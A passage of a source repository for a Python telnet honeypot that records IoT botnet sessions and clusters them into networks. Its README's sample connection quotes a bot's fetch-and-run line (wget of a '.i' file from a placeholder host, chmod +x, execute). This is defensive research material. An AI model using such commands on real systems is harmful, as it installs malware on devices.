Repository: Phype/telnet-iot-honeypot Branch: master Commit: 5d32829a36b5 Files: 82 Total size: 309.8 KB Directory structure: gitextract_2jzluwq6/ ├── .gitignore ├── Dockerfile ├── INSTALL.md ├── README.md ├── backend/ │ ├── __init__.py │ ├── additionalinfo.py │ ├── authcontroller.py │ ├── backend.py │ ├── clientcontroller.py │ ├── cuckoo.py │ ├── db.py │ ├── ipdb/ │ │ ├── .gitignore │ │ ├── __init__.py │ │ └── ipdb.py │ ├── virustotal.py │ ├── virustotal_fill_db.py │ └── webcontroller.py ├── backend.py ├── config.dist.yaml ├── create_config.sh ├── create_docker.sh ├── honeypot/ │ ├── __init__.py │ ├── __main__.py │ ├── client.py │ ├── sampledb_client.py │ ├── session.py │ ├── shell/ │ │ ├── __init__.py │ │ ├── commands/ │ │ │ ├── __init__.py │ │ │ ├── base.py │ │ │ ├── binary.py │ │ │ ├── cmd_util.py │ │ │ ├── shell.py │ │ │ ├── shellcode.py │ │ │ ├── tftp.py │ │ │ └── wget.py │ │ ├── grammar.peg │ │ ├── grammar.py │ │ ├── shell.py │ │ ├── test.sh │ │ └── test.txt │ └── telnet.py ├── honeypot.py ├── html/ │ ├── .gitignore │ ├── admin.html │ ├── asn.html │ ├── common.js │ ├── connection.html │ ├── connectionlist-embed.html │ ├── connectionlist.html │ ├── countries.js │ ├── fancy/ │ │ ├── connhash/ │ │ │ └── index.html │ │ └── graph/ │ │ └── index.html │ ├── img/ │ │ ├── LICENSE │ │ └── flags/ │ │ └── LICENSE │ ├── index.html │ ├── js/ │ │ └── angular-vis.js │ ├── network.html │ ├── networks.html │ ├── overview.html │ ├── sample.html │ ├── sample.js │ ├── samples.html │ ├── tag.html │ ├── tags.html │ ├── url.html │ └── urls.html ├── requirements.txt ├── tftpy/ │ ├── TftpClient.py │ ├── TftpContexts.py │ ├── TftpPacketFactory.py │ ├── TftpPacketTypes.py │ ├── TftpServer.py │ ├── TftpShared.py │ ├── TftpStates.py │ └── __init__.py ├── util/ │ ├── __init__.py │ ├── config.py │ └── dbg.py └── vagrant/ ├── .gitignore ├── mariadb/ │ ├── Vagrantfile │ └── mysql.sh └── sqlite/ └── Vagrantfile ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ *.pyc *.db samples/ Mirai-Source-Code-master/ obf.py import-lost-conns.py import-length.py review-sampels.py *.kate-swp *.sql *.log config.yaml ================================================ FILE: Dockerfile ================================================ FROM python:2 WORKDIR /usr/src/app COPY ./requirements.txt ./ RUN pip install --no-cache-dir -r requirements.txt RUN pip install mysqlclient COPY . . RUN apt update && apt install -y sqlite3 ================================================ FILE: INSTALL.md ================================================ # Installation For installation instructions, go to section Manual installation. However, if you just want to get everythig running, there is also a Vagrantfile. See Section Vagrent for that. # Vagrant There is a Vagrantfile in the folder vagrant/ you can use to just make a basic deployment with honeypot + backend + sqlite running. Install vagrant and vagrant virtualbox porvider, then go to vagrant folder and type `vagrant up`. After a while the box should run a honeypot + backend available via port-forwarding at `http://localhost:5000/` and `telnet://localhost:2223`. # Manual installation confirmed to work with Ubuntu 16.04.2 LTS Install all requirements: ``` apt-get install -y python-pip libmysqlclient-dev python-mysqldb git sqlite3 git clone https://github.com/Phype/telnet-iot-honeypot.git cd telnet-iot-honeypot pip install -r requirements.txt ``` sudo apt-get install python-setuptools python-werkzeug \ python-flask python-flask-httpauth python-sqlalchemy \ python-requests python-decorator python-dnspython \ python-ipaddress python-simpleeval python-yaml If you want to use mysql, create a mysql database. Default mysql max key length is 767 bytes, so it is recommended to use latin1 charset, else the db setup will fail. ``` apt-get install mysql-server mysql-client sudo mysql_secure_installation mysql CREATE DATABASE telhoney CHARACTER SET latin1 COLLATE latin1_swedish_ci; grant all privileges on telhoney.* to telhoney@localhost identified by "YOUR_PASSWORD"; flush privileges; ``` ## Configuration This software consists of 2 components, a honeypot (client) and a backend (server). The honeypot will accept incoming telnet connections and may download samples which an adversary may try to download in the telnet session. When a session is closed, the honeypot will post all data about the connection to the backend using a REST-API. The configuration for both honeypot and backend is in the files `config.dist.yaml` and `config.yaml`. The `config.dist.yaml` contains the default config. If you want to change anything, change or create overriding entries in `config.yaml`. If you need documentation about the configuration, the file `config.dist.yaml` contains some comments. The REST-API requires authentification (HTTP Basic Auth). When the backend is started for the first time, it will create a "users" table in the database containing an "admin" user. The admin users password is read from the configuration file. If this file is empty, it will be created with random credentials. *TL;DR*: The default config should just work, if you need the credentials for the admin user, see the file `config.yaml`. ## Running Create a config: bash create_config.sh Start the backend: python backend.py Now, start the honeypot: python honeypot.py Now, you can test the honeypot telnet 127.0.0.1 2223 ## HTML Frontend You can use the frontend by just opening the file html/index.html in your browser. If you want to make the frontend publically available, deploy the html/ folder to you webserver, or install one: ``` sudo apt-get install apache2 cd telnet-iot-honeypot cp -R html /var/www sudo chown www-data:www-data /var/www -R ``` ## Virustotal integration Please get yout own virustotal key, since mine only allows for 4 API Req/min. For how to do this, see https://www.virustotal.com/de/faq/#virustotal-api When you got one, put it in your config.yamland enable virustotal integration: vt_key: "GET_YOUR_OWN" submit_to_vt: true If you want to import virustotal reports of the collected samples, run (may have to restart because of db locks). *TODO*: test if this still works python virustotal_fill_db.php ================================================ FILE: README.md ================================================ ## Disclaimer This project neither supported or in development anymore. It is based on python2 which has reached its EOL in 2020 and uses dependencies which are getting harder to install over time. Use at your own risk! # Telnet IoT honeypot 'Python telnet honeypot for catching botnet binaries' This project implements a python telnet server trying to act as a honeypot for IoT Malware which spreads over horribly insecure default passwords on telnet servers on the internet. The honeypot works by emulating a shell enviroment, just like cowrie (https://github.com/micheloosterhof/cowrie). The aim of this project is primarily to automatically analyse Botnet connections and "map" Botnets by linking diffrent connections and even Networks together. ## Architecture The application has a client/server architecture, with a client (the actual honeypot) accepting telnet connections and a server which receives information about connections and does the analysis. The backend server exposes a HTTP interface which is used to access to frontend as well as by the clients to push new Connection information to the backend. ## Automatic analysis The Backend uses 2 diffrent mechanisms to automatically link connections: ### Networks Networks are discovered Botnets. A network is the set of all linked connections, urls and samples. Urls and samples are linked when they are used in a connection. Two connections are linked when both connections are recieved by the same honeypot client (mutliple clients are supported!) and use the same credentials in a short period of time (defautl 2 minutes) or come from the same IP address. ### Malware Multiple networks are identified to use the same type of malware if the text entered during sessions of the networks aro mostly the same. This comparison is done using sort of "hash"-function which basically translates a session (or connection) into a sequence of words and then maps each word to a single byte so this resulting sequence of bytes can be easily searched. # Running The application has a config file named config.py. Samples are included for local and client/server deployments. ## Configuration The backend requires a SQL-database (default sqlite) which is initialized at first run. Before the first run you should generate a admin account which is used to generate more users. The admin account can also directly used by a client to post connections. When more than one honeypots shall be connected, creating multiple users is recommended. bash create_config.sh Both client and backend will read the files `config.yaml` and `config.dist.yaml` to read configuration parameters. The `config.dist.yaml` file includes default values for all but admin user credentials and these parameters are overwirtten by entries in the `config.yaml` file. ## Running the Server python backend.py ## Running the Client This project contains an own honeypot, however because of the client-server architecture, other honeypot can be used as well. ### Using the built-in honeypot python honeypot.py The client cannot be started without the server running. To use a diffrent configuration for the client you can use the `-c` switch like this: python honeypot.py -c myconfig.yaml If you only want to check the honeypot functionality, you can start the client in interactive mode: python honeypot shell ### Using cowrie I wrote an output plugin for cowrie, which has much more features than the built in honeypot. If you want to use cowrie instead, checkout my fork which includes the output module here: https://github.com/Phype/cowrie . ## Opening the frontend After the server is started, open `http://127.0.0.1/` in your favorite browser. ## Sample Connection enable shell sh cat /proc/mounts; /bin/busybox PEGOK cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK nc; wget; /bin/busybox PEGOK (dd bs=52 count=1 if=.s || cat .s) /bin/busybox PEGOK rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit ## Images ![Screenshot 1](images/screen1.png) ![Screenshot 2](images/screen2.png) ![Screenshot 3](images/screen3.png) ================================================ FILE: backend/__init__.py ================================================ ================================================ FILE: backend/additionalinfo.py ================================================ import dns.resolver import ipaddress import urlparse import re import traceback import ipdb.ipdb def filter_ascii(string): string = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in "\r\n ") return string def query_txt(cname): try: answer = dns.resolver.query(filter_ascii(cname), "TXT") for rr in answer.rrset: if rr.strings: return rr.strings[0] except Exception as e: traceback.print_exc() pass return None def query_a(cname): try: answer = dns.resolver.query(filter_ascii(cname), "A") for data in answer: if data.address: return data.address except: traceback.print_exc() pass return None def txt_to_ipinfo(txt): parts = txt.split("|") return { "asn": filter_ascii(parts[0].strip()), "ipblock": filter_ascii(parts[1].strip()), "country": filter_ascii(parts[2].strip()), "reg": filter_ascii(parts[3].strip()), "updated": filter_ascii(parts[4].strip()) } def txt_to_asinfo(txt): parts = txt.split("|") return { "asn": filter_ascii(parts[0].strip()), "country": filter_ascii(parts[1].strip()), "reg": filter_ascii(parts[2].strip()), "updated": filter_ascii(parts[3].strip()), "name": filter_ascii(parts[4].strip()) } def get_ip4_info(ip): oktets = ip.split(".") reverse = oktets[3] + "." + oktets[2] + "." + oktets[1] + "." + oktets[0] answer = query_txt(reverse + ".origin.asn.cymru.com") if answer: return txt_to_ipinfo(answer) return None def get_ip6_info(ip): ip = ipaddress.ip_address(unicode(ip)) ip = list(ip.exploded.replace(":", "")) ip.reverse() reverse = ".".join(ip) answer = query_txt(reverse + ".origin6.asn.cymru.com") if answer: return txt_to_ipinfo(answer) return None def get_ip_info(ip): is_v4 = "." in ip is_v6 = ":" in ip if is_v4: return get_ip4_info(ip) elif is_v6: return get_ip6_info(ip) else: print("Cannot parse ip " + ip) return None def get_asn_info(asn): answer = query_txt("AS" + str(asn) + ".asn.cymru.com") if answer: return txt_to_asinfo(answer) return None def get_url_info(url): try: parsed = urlparse.urlparse(url) netloc = parsed.netloc ip = None # IPv6 if "[" in netloc: netloc = re.match("\\[(.*)\\]", netloc).group(1) ip = netloc # IPv4 / domain name else: if ":" in netloc: netloc = re.match("(.*?):", netloc).group(1) if re.match("[a-zA-Z]", netloc): ip = query_a(netloc) else: ip = netloc return ip, get_ip_info(ip) except: traceback.print_exc() pass return None if __name__ == "__main__": print get_ip_info("79.220.249.125") print get_ip_info("2a00:1450:4001:81a::200e") print get_asn_info(3320) print get_url_info("http://google.com") print get_url_info("http://183.144.16.51:14722/.i") print get_url_info("http://[::1]:14722/.i") ================================================ FILE: backend/authcontroller.py ================================================ import os import hashlib import traceback import struct import json import time import additionalinfo import ipdb.ipdb from sqlalchemy import desc, func, and_, or_ from decorator import decorator from functools import wraps from simpleeval import simple_eval from argon2 import argon2_hash from db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper from virustotal import Virustotal from cuckoo import Cuckoo from util.dbg import dbg from util.config import config from difflib import ndiff class AuthController: def __init__(self): self.session = None self.salt = config.get("backend_salt") self.checkInitializeDB() def pwhash(self, username, password): return argon2_hash(str(password), self.salt + str(username), buflen=32).encode("hex") @db_wrapper def checkInitializeDB(self): user = self.session.query(User).filter(User.id == 1).first() if user == None: admin_name = config.get("backend_user") admin_pass = config.get("backend_pass") print 'Creating admin user "' + admin_name + '" see config for password' self.addUser(admin_name, admin_pass, 1) @db_wrapper def getUser(self, username): user = self.session.query(User).filter(User.username == username).first() return user.json(depth=1) if user else None @db_wrapper def addUser(self, username, password, id=None): user = User(username=username, password=self.pwhash(username, password)) if id != None: user.id = id self.session.add(user) return user.json() @db_wrapper def checkAdmin(self, user): user = self.session.query(User).filter(User.username == user).first() if user == None: return False return user.id == 1 @db_wrapper def checkLogin(self, username, password): user = self.session.query(User).filter(User.username == username).first() if user == None: return False if self.pwhash(username, password) == user.password: return True else: return False ================================================ FILE: backend/backend.py ================================================ from flask import Flask, request, Response, redirect, send_from_directory from flask_httpauth import HTTPBasicAuth from flask_socketio import SocketIO auth = HTTPBasicAuth() from db import get_db from clientcontroller import ClientController from webcontroller import WebController from authcontroller import AuthController from util.config import config import os import json import base64 import time import signal app = Flask(__name__) ctrl = ClientController() web = WebController() authctrl = AuthController() socketio = SocketIO(app) app.debug = True def red(obj, attributes): if not obj: return None res = {} for a in attributes: if a in obj: res[a] = obj[a] return res ### # # Globals # ### SECS_PER_MONTH = 3600 * 24 * 31 @app.after_request def add_cors(response): response.headers["Access-Control-Allow-Origin"] = "*" response.headers["Access-Control-Allow-Methods"] = "GET, POST, PUT, DELETE" response.headers["Access-Control-Allow-Headers"] = "Authorization, Content-type" return response @auth.verify_password def verify_password(username, password): return authctrl.checkLogin(username, password) ### # # Index # ### @app.route('/') def send_index(): return redirect('/html/index.html') @app.route('/html/') def serve_static(filename): root_dir = os.getcwd() return send_from_directory(os.path.join(root_dir, 'html'), filename) ### # # Admin API # ### @app.route("/user/", methods = ["PUT"]) @auth.login_required def add_user(username): if authctrl.checkAdmin(auth.username()): user = request.json if user["username"] != username: return "username mismatch in url/data", 500 return json.dumps(authctrl.addUser(user["username"], user["password"])) else: return "Authorization required", 401 ### # # Upload API # ### @app.route("/login") @auth.login_required def test_login(): return "LOGIN OK" @app.route("/conns", methods = ["PUT"]) @auth.login_required def put_conn(): session = request.json session["backend_username"] = auth.username() print("--- PUT SESSION ---") print(json.dumps(session)) session = ctrl.put_session(session) socketio.emit('session', session) return json.dumps(session) @app.route("/sample/", methods = ["PUT"]) @auth.login_required def put_sample_info(sha256): sample = request.json return json.dumps(ctrl.put_sample_info(sample)) @app.route("/sample//update", methods = ["GET"]) @auth.login_required def update_sample(sha256): return json.dumps(ctrl.update_vt_result(sha256)) @app.route("/file", methods = ["POST"]) @auth.login_required def put_sample(): data = request.get_data() return json.dumps(ctrl.put_sample(data)) ### # # Public API # ### def fail(msg = "", code = 400): obj = {"ok" : False, "msg" : msg} return Response(json.dumps(obj), status=code, mimetype='application/json') ### Networks @app.route("/housekeeping", methods = ["GET"]) def housekeeping(): ctrl.do_housekeeping() return "DONE" @app.route("/networks", methods = ["GET"]) def get_networks(): return json.dumps(web.get_networks()) @app.route("/network/", methods = ["GET"]) def get_network(net_id): return json.dumps(web.get_network(net_id)) @app.route("/network//locations", methods = ["GET"]) def get_network_locations(net_id): now = int(time.time()) loc = web.get_connection_locations(now - SECS_PER_MONTH, now, int(net_id)) return json.dumps(loc) @app.route("/network//history", methods = ["GET"]) def get_network_history(net_id): not_before = request.args.get("not_before") not_after = request.args.get("not_after") if not_before == None or not_after == None: not_after = int(time.time()) not_before = not_after - SECS_PER_MONTH else: not_before = int(not_before) not_after = int(not_after) d = web.get_network_history(not_before, not_after, int(net_id)) return json.dumps(d) @app.route("/network/biggest_history", methods = ["GET"]) def get_network_biggest_history(): not_before = request.args.get("not_before") not_after = request.args.get("not_after") if not_before == None or not_after == None: not_after = int(time.time()) not_before = not_after - SECS_PER_MONTH else: not_before = int(not_before) not_after = int(not_after) d = web.get_biggest_networks_history(not_before, not_after) return json.dumps(d) ### Malwares @app.route("/malwares", methods = ["GET"]) def get_malwares(): return json.dumps(web.get_malwares()) ### Samples @app.route("/sample/") def get_sample(sha256): sample = web.get_sample(sha256) if sample: return json.dumps(sample) else: return "", 404 @app.route("/sample/newest") def get_newest_samples(): samples = web.get_newest_samples() return json.dumps(samples) ### Urls @app.route("/url/", methods = ["GET"]) def get_url(ref_enc): ref = base64.b64decode(ref_enc) print("\"" + ref_enc + "\" decodes to \"" + ref + "\"") url = web.get_url(ref) if url: return json.dumps(url) else: return "", 404 @app.route("/url/newest") def get_newest_urls(): urls = web.get_newest_urls() return json.dumps(urls) ### connections @app.route("/connection/") def get_connection(id): conn = web.get_connection(id) if conn: return json.dumps(conn) else: return "", 404 @app.route("/connections") def get_connections(): obj = {} allowed_keys = ["ipblock", "user", "password", "ip", "country", "asn_id", "network_id"] for k,v in request.args.iteritems(): if k in allowed_keys: obj[k] = v conn = web.get_connections(obj, request.args.get("older_than", None)) if conn: return json.dumps(conn) else: return "", 404 @app.route("/connections_fast") def get_connections_fast(): conn = web.get_connections_fast() if conn: return json.dumps(conn) else: return "", 404 @app.route("/connection/statistics/per_country") def get_country_stats(): stats = web.get_country_stats() return json.dumps(stats) @app.route("/connection/by_country/") def get_country_connections(country): older_than = request.args.get('older_than', None) stats = web.get_country_connections(country, older_than) return json.dumps(stats) @app.route("/connection/by_ip/") def get_ip_connections(ip): older_than = request.args.get('older_than', None) stats = web.get_ip_connections(ip, older_than) return json.dumps(stats) @app.route("/connection/newest") def get_newest_connections(): connections = web.get_newest_connections() return json.dumps(connections) @app.route("/connection/locations") def get_connection_locations(): now = int(time.time()) loc = web.get_connection_locations(now - SECS_PER_MONTH, now) return json.dumps(loc) ### Tags @app.route("/tag/") def get_tag(name): tag = web.get_tag(name) if tag: return json.dumps(tag) else: return "", 404 @app.route("/tags") def get_tags(): tags = web.get_tags() return json.dumps(tags) ### Hist @app.route("/connhashtree/") def connhash_tree(layers): return json.dumps(web.connhash_tree(int(layers))) ### ASN @app.route("/asn/") def get_asn(asn): info = web.get_asn(asn) if not info: return "", 404 return json.dumps(info) def run(): signal.signal(15, stop) app.run(host=config.get("http_addr"), port=config.get("http_port"),threaded=True) #socketio.run(app, host=config.get("http_addr"), port=config.get("http_port")) def stop(): print "asdasdasd" if __name__ == "__main__": run() ================================================ FILE: backend/clientcontroller.py ================================================ import os import hashlib import traceback import struct import json import time import socket import urlparse import random import additionalinfo import ipdb.ipdb from sqlalchemy import desc, func, and_, or_ from decorator import decorator from functools import wraps from simpleeval import simple_eval from argon2 import argon2_hash from db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper from virustotal import Virustotal from cuckoo import Cuckoo from util.dbg import dbg from util.config import config from difflib import ndiff ANIMAL_NAMES = ["Boar","Stallion","Yak","Beaver","Salamander","Eagle Owl","Impala","Elephant","Chameleon","Argali","Lemur","Addax","Colt", "Whale","Dormouse","Budgerigar","Dugong","Squirrel","Okapi","Burro","Fish","Crocodile","Finch","Bison","Gazelle","Basilisk", "Puma","Rooster","Moose","Musk Deer","Thorny Devil","Gopher","Gnu","Panther","Porpoise","Lamb","Parakeet","Marmoset","Coati", "Alligator","Elk","Antelope","Kitten","Capybara","Mule","Mouse","Civet","Zebu","Horse","Bald Eagle","Raccoon","Pronghorn", "Parrot","Llama","Tapir","Duckbill Platypus","Cow","Ewe","Bighorn","Hedgehog","Crow","Mustang","Panda","Otter","Mare", "Goat","Dingo","Hog","Mongoose","Guanaco","Walrus","Springbok","Dog","Kangaroo","Badger","Fawn","Octopus","Buffalo","Doe", "Camel","Shrew","Lovebird","Gemsbok","Mink","Lynx","Wolverine","Fox","Gorilla","Silver Fox","Wolf","Ground Hog","Meerkat", "Pony","Highland Cow","Mynah Bird","Giraffe","Cougar","Eland","Ferret","Rhinoceros"] # Controls Actions perfomed by Honeypot Clients class ClientController: def __init__(self): self.session = None if config.get("submit_to_vt"): self.vt = Virustotal(config.get("vt_key", optional=True)) else: self.vt = None self.cuckoo = Cuckoo(config) self.do_ip_to_asn_resolution = False self.ip2asn = config.get("ip_to_asn_resolution", optional=True, default=True) if self.ip2asn == "offline": self.do_ip_to_asn_resolution = True self.fill_db_ipranges() if self.ip2asn == "online": self.do_ip_to_asn_resolution = True @db_wrapper def _get_asn(self, asn_id): asn_obj = self.session.query(ASN).filter(ASN.asn == asn_id).first() if asn_obj: return asn_obj else: asn_info = additionalinfo.get_asn_info(asn_id) if asn_info: asn_obj = ASN(asn=asn_id, name=asn_info['name'], reg=asn_info['reg'], country=asn_info['country']) self.session.add(asn_obj) return asn_obj return None def calc_connhash_similiarity(self, h1, h2): l = min(len(h1), len(h2)) r = 0 for i in range(0, l): r += int(h1[i] != h2[i]) if l == 0: return 0 return float(r)/float(l) def calc_connhash(self, stream): output = "" for event in stream: if event["in"]: line = event["data"] line = line.strip() parts = line.split(" ") for part in parts: part_hash = chr(hash(part) % 0xFF) output += part_hash # Max db len is 256, half because of hex encoding return output[:120] @db_wrapper def fill_db_ipranges(self): if self.session.query(IPRange.ip_min).count() != 0: return print "Filling IPRange Tables" asntable = ipdb.ipdb.get_asn() progress = 0 for row in ipdb.ipdb.get_geo_iter(): progress += 1 if progress % 1000 == 0: self.session.commit() self.session.flush() print str(100.0 * float(row[0]) / 4294967296.0) + "% / " + str(100.0 * progress / 3315466) + "%" ip = IPRange(ip_min = int(row[0]), ip_max=int(row[1])) ip.country = row[2] ip.region = row[4] ip.city = row[5] ip.zipcode = row[8] ip.timezone = row[9] ip.latitude = float(row[6]) ip.longitude = float(row[7]) asn_data = asntable.find_int(ip.ip_min) if asn_data: asn_id = int(asn_data[3]) asn_db = self.session.query(ASN).filter(ASN.asn == asn_id).first() if asn_db == None: asn_db = ASN(asn = asn_id, name = asn_data[4], country=ip.country) self.session.add(asn_db) ip.asn = asn_db # Dont add session if we cannot find an asn for it self.session.add(ip) print "IPranges loaded" @db_wrapper def get_ip_range_offline(self, ip): ip_int = ipdb.ipdb.ipstr2int(ip) range = self.session.query(IPRange).filter(and_(IPRange.ip_min <= ip_int, ip_int <= IPRange.ip_max)).first() return range def get_ip_range_online(self, ip): addinfo = additionalinfo.get_ip_info(ip) if addinfo: # TODO: Ugly hack range = type('',(object,),{})() range.country = addinfo["country"] range.city = "Unknown" range.latitude = 0 range.longitude = 0 range.asn_id = int(addinfo["asn"]) range.asn = self._get_asn(range.asn_id) range.cidr = addinfo["ipblock"] return range else: return None def get_ip_range(self, ip): if self.ip2asn == "online": return self.get_ip_range_online(ip) else: return self.get_ip_range_offline(ip) def get_url_info(self, url): parsed = urlparse.urlparse(url) host = parsed.netloc.split(':')[0] if host[0].isdigit(): ip = host else: try: ip = socket.gethostbyname(host) except: return None range = self.get_ip_range(ip) return ip, range @db_wrapper def do_housekeeping(self): for malware in self.session.query(Malware).all(): malware.name = random.choice(ANIMAL_NAMES) # rebuild nb_firstconns if False: net_cache = {} for conn in self.session.query(Connection).all(): if len(conn.conns_before) == 0: if conn.network_id in net_cache: net_cache[conn.network_id] += 1 else: net_cache[conn.network_id] = 1 for network in self.session.query(Network).all(): if network.id in net_cache: network.nb_firstconns = net_cache[network.id] else: network.nb_firstconns = 0 print "Net " + str(network.id) + ": " + str(network.nb_firstconns) @db_wrapper def put_session(self, session): connhash = self.calc_connhash(session["stream"]).encode("hex") backend_user = self.session.query(User).filter( User.username == session["backend_username"]).first() conn = Connection(ip=session["ip"], user=session["user"], date=session["date"], password=session["pass"], stream=json.dumps(session["stream"]), connhash=connhash, backend_user_id=backend_user.id) conn.user = filter_ascii(conn.user) conn.password = filter_ascii(conn.password) if self.do_ip_to_asn_resolution: range = self.get_ip_range(conn.ip) if range: conn.country = range.country conn.city = range.city conn.lat = range.latitude conn.lon = range.longitude conn.asn = range.asn self.session.add(conn) self.session.flush() # to get id network_id = None samples = [] urls = [] for sample_json in session["samples"]: # Ignore junk - may clean up the db a bit if sample_json["length"] < 2000: continue sample, url = self.create_url_sample(sample_json) if sample: if network_id == None and sample.network_id != None: network_id = sample.network_id samples.append(sample) if url: if network_id == None and url.network_id != None: network_id = url.network_id conn.urls.append(url) urls.append(url) # Find previous connections # A connection is associated when: # - same honeypot/user # - connection happened as long as 120s before # - same client ip OR same username/password combo assoc_timediff = 120 assoc_timediff_sameip = 3600 previous_conns = (self.session.query(Connection). filter( or_( and_( Connection.date > (conn.date - assoc_timediff), Connection.user == conn.user, Connection.password == conn.password ), and_( Connection.date > (conn.date - assoc_timediff_sameip), Connection.ip == conn.ip ) ), Connection.backend_user_id == conn.backend_user_id, Connection.id != conn.id).all()) for prev in previous_conns: if network_id == None and prev.network_id != None: network_id = prev.network_id conn.conns_before.append(prev) # Check connection against all tags tags = self.session.query(Tag).all() for tag in tags: json_obj = conn.json(depth = 0) json_obj["text_combined"] = filter_ascii(json_obj["text_combined"]) if simple_eval(tag.code, names=json_obj) == True: self.db.link_conn_tag(conn.id, tag.id) # Only create new networks for connections with urls or associtaed conns, # to prevent the creation of thousands of networks # NOTE: only conns with network == NULL will get their network updated # later so whe should only create a network where we cannot easily # change it later haslogin = conn.user != None and conn.user != "" if (len(conn.urls) > 0 or len(previous_conns) > 0) and network_id == None and haslogin: print(" --- create network --- ") network_id = self.create_network().id # Update network on self conn.network_id = network_id # Update network on all added Urls for url in urls: if url.network_id == None: url.network_id = network_id # Update network on all added Samples for sample in samples: if sample.network_id == None: sample.network_id = network_id # Update network on all previous connections withut one if network_id != None: for prev in previous_conns: if prev.network_id == None: prev.network_id = network_id # Update number of first conns on network if len(prev.conns_before) == 0: conn.network.nb_firstconns += 1 self.session.flush() # Check for Malware type # only if our network exists AND has no malware associated if conn.network != None and conn.network.malware == None: # Find connections with similar connhash similar_conns = (self.session.query(Connection) .filter(func.length(Connection.connhash) == len(connhash)) .all()) min_sim = 2 min_conn = None for similar in similar_conns: if similar.network_id != None: c1 = connhash.decode("hex") c2 = similar.connhash.decode("hex") sim = self.calc_connhash_similiarity(c1, c2) if sim < min_sim and similar.network.malware != None: min_sim = sim min_conn = similar # 0.9: 90% or more words in session are equal # think this is probably the same kind of malware # doesn't need to be the same botnet though! if min_sim < 0.9: conn.network.malware = min_conn.network.malware else: conn.network.malware = Malware() conn.network.malware.name = random.choice(ANIMAL_NAMES) self.session.add(conn.network.malware) self.session.flush() # Update network number of first connections if len(previous_conns) == 0 and conn.network_id != None: conn.network.nb_firstconns += 1 return conn.json(depth=1) @db_wrapper def create_network(self): net = Network() self.session.add(net) self.session.flush() return net def create_url_sample(self, f): url = self.session.query(Url).filter(Url.url==f["url"]).first() if url == None: url_ip = None url_asn = None url_country = None if self.do_ip_to_asn_resolution: url_ip, url_range = self.get_url_info(f["url"]) if url_range: url_asn = url_range.asn_id url_country = url_range.country url = Url(url=f["url"], date=f["date"], ip=url_ip, asn_id=url_asn, country=url_country) self.session.add(url) if f["sha256"] != None: sample = self.session.query(Sample).filter(Sample.sha256 == f["sha256"]).first() if sample == None: result = None try: if self.vt != None: vtobj = self.vt.query_hash_sha256(f["sha256"]) if vtobj: result = str(vtobj["positives"]) + "/" + str(vtobj["total"]) + " " + self.vt.get_best_result(vtobj) except: pass sample = Sample(sha256=f["sha256"], name=f["name"], length=f["length"], date=f["date"], info=f["info"], result=result) self.session.add(sample) if sample.network_id != None and url.network_id == None: url.network_id = sample.network_id if sample.network_id == None and url.network_id != None: sample.network_id = url.network_id else: sample = None url.sample = sample return sample, url @db_wrapper def put_sample(self, data): sha256 = hashlib.sha256(data).hexdigest() self.db.put_sample_data(sha256, data) if config.get("cuckoo_enabled"): self.cuckoo.upload(os.path.join(config.get("sample_dir"), sha256), sha256) elif config.get("submit_to_vt"): self.vt.upload_file(os.path.join(config.get("sample_dir"), sha256), sha256) @db_wrapper def update_vt_result(self, sample_sha): sample = self.session.query(Sample).filter(Sample.sha256 == sample_sha).first() if sample: vtobj = self.vt.query_hash_sha256(sample_sha) if vtobj: sample.result = str(vtobj["positives"]) + "/" + str(vtobj["total"]) + " " + self.vt.get_best_result(vtobj) return sample.json(depth=1) return None ================================================ FILE: backend/cuckoo.py ================================================ import json import os try: from urllib.parse import urlparse, urljoin except ImportError: from urlparse import urlparse, urljoin import requests from requests.auth import HTTPBasicAuth from util.config import config try: import urllib3 urllib3.disable_warnings() except (AttributeError, ImportError): pass class Cuckoo(): def __init__(self, config): self.url_base = config.get("cuckoo_url_base") self.api_user = config.get("cuckoo_user") self.api_passwd = config.get("cuckoo_passwd") self.cuckoo_force = config.get("cuckoo_force") def upload(self, path, name): if self.cuckoo_force or self.cuckoo_check_if_dup(os.path.basename(path)) is False: print("Sending file to Cuckoo") self.postfile(path, name) def cuckoo_check_if_dup(self, sha256): """ Check if file already was analyzed by cuckoo """ try: print("Looking for tasks for: {}".format(sha256)) res = requests.get(urljoin(self.url_base, "/files/view/sha256/{}".format(sha256)), verify=False, auth=HTTPBasicAuth(self.api_user,self.api_passwd), timeout=60) if res and res.ok and res.status_code == 200: print("Sample found in Sandbox, with ID: {}".format(res.json().get("sample", {}).get("id", 0))) return True else: return False except Exception as e: print(e) return False def postfile(self, artifact, fileName): """ Send a file to Cuckoo """ files = {"file": (fileName, open(artifact, "rb").read())} try: res = requests.post(urljoin(self.url_base, "tasks/create/file").encode("utf-8"), files=files, auth=HTTPBasicAuth( self.api_user, self.api_passwd ), verify=False) if res and res.ok: print("Cuckoo Request: {}, Task created with ID: {}".format(res.status_code, res.json()["task_id"])) else: print("Cuckoo Request failed: {}".format(res.status_code)) except Exception as e: print("Cuckoo Request failed: {}".format(e)) return def posturl(self, scanUrl): """ Send a URL to Cuckoo """ data = {"url": scanUrl} try: res = requests.post(urljoin(self.url_base, "tasks/create/url").encode("utf-8"), data=data, auth=HTTPBasicAuth( self.api_user, self.api_passwd ), verify=False) if res and res.ok: print("Cuckoo Request: {}, Task created with ID: {}".format(res.status_code, res.json()["task_id"])) else: print("Cuckoo Request failed: {}".format(res.status_code)) except Exception as e: print("Cuckoo Request failed: {}".format(e)) return ================================================ FILE: backend/db.py ================================================ import time import json import sqlalchemy import random from decorator import decorator from sqlalchemy import Table, Column, BigInteger, Integer, Float, String, MetaData, ForeignKey, Text, Index from sqlalchemy.sql import select, join, insert, text from sqlalchemy.orm import relationship, sessionmaker, scoped_session from sqlalchemy.pool import QueuePool from sqlalchemy.ext.declarative import declarative_base from util.config import config is_sqlite = "sqlite://" in config.get("sql") print("Creating/Connecting to DB") @decorator def db_wrapper(func, *args, **kwargs): self = args[0] if self.session: return func(*args, **kwargs) else: self.db = get_db() self.session = self.db.sess try: return func(*args, **kwargs) self.session.commit() self.session.flush() finally: self.db.end() self.db = None self.session = None def now(): return int(time.time()) def filter_ascii(string): if string == None: string = "" string = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in "\r\n ") return string Base = declarative_base() # n to m relation connection <-> url conns_urls = Table('conns_urls', 